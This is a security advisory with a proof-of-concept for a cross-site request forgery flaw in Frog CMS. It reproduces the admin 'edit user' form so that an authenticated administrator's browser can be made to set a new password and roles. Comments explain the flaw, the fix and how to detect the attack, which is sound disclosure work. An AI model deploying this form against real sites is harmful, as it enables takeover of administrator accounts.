< ------------------- header data start ------------------- >
#############################################################
# Application Name : Frog CMS
# Vulnerability Type : XSRF (cross-site request forgery, also written CSRF)
# Impact : Admin sifresi degistirebilir (the administrator's password can be changed) ..
# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir (add a session token to the form and require the old password) ..
# author : _iLLeqaL_ ~ Bug Researchers
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
<!--
  Copy of the Frog CMS "edit user" form, as reproduced by the advisory.
  It POSTs to the admin endpoint /?/user/edit/1 and carries the profile,
  password and permission fields for that user record.

  Why the advisory classes this as XSRF: none of the fields below is a
  per-session anti-forgery token, and no field asks for the current
  password, so the form as shown gives the server nothing to tell a
  submission made from the admin panel apart from one made elsewhere in an
  authenticated admin's browser. Whether the server applies another check
  (e.g. Origin/Referer validation) is not shown here; confirm against the
  application code.

  Mitigation named by the advisory: add a session-bound token to the form
  and verify it on the server, and require the old password before a change.
  Marking the session cookie SameSite is a further, generic layer.
  Detection: review web logs for POSTs to /?/user/edit/ whose Origin or
  Referer is not the site's own origin.
-->
<form action=http://demo.opensourcecms.com/frog/admin/?/user/edit/1 method=post>
<input class=textbox id=user_name maxlength=100 name=user[name] size=40 type=text value=Administrator /><br>
<!-- "[email protected]" appears to be a placeholder substituted by the hosting page's e-mail obfuscation, not the original value. -->
<input class=textbox id=user_email maxlength=255 name=user[email] size=40 type=text value=[email protected] /><br>
<!-- Disabled controls are not included in a form submission, so user[username] is not sent. -->
<input class=textbox id=user_username maxlength=40 name=user[username] size=40 type=text value=admin disabled=disabled /><br>
<!-- New password and its confirmation ("Sifre" = password, "Tekrar Sifre" = repeat password); there is no current-password field. -->
<input class=textbox id=user_password maxlength=40 name=user[password] size=40 type=password value= />(Sifre)<br>
<input class=textbox id=user_confirm maxlength=40 name=user[confirm] size=40 type=password value= />(Tekrar Sifre)<br>
<!-- Role checkboxes: the same request also carries permission assignments, so they need the same token protection as the password fields. -->
<span class=checkbox><input checked=checked id=user_permission-administrator name=user_permission[administrator] type=checkbox value=1 /> <label for=user_permission-administrator>Administrator</label></span>
<span class=checkbox><input id=user_permission-developer name=user_permission[developer] type=checkbox value=2 /> <label for=user_permission-developer>Developer</label></span>
<span class=checkbox><input id=user_permission-editor name=user_permission[editor] type=checkbox value=3 /> <label for=user_permission-editor>Editor</label></span><br>
<input class=button name=commit type=submit accesskey=s value=Save /><br>
</form>
< -- bug code end of -- >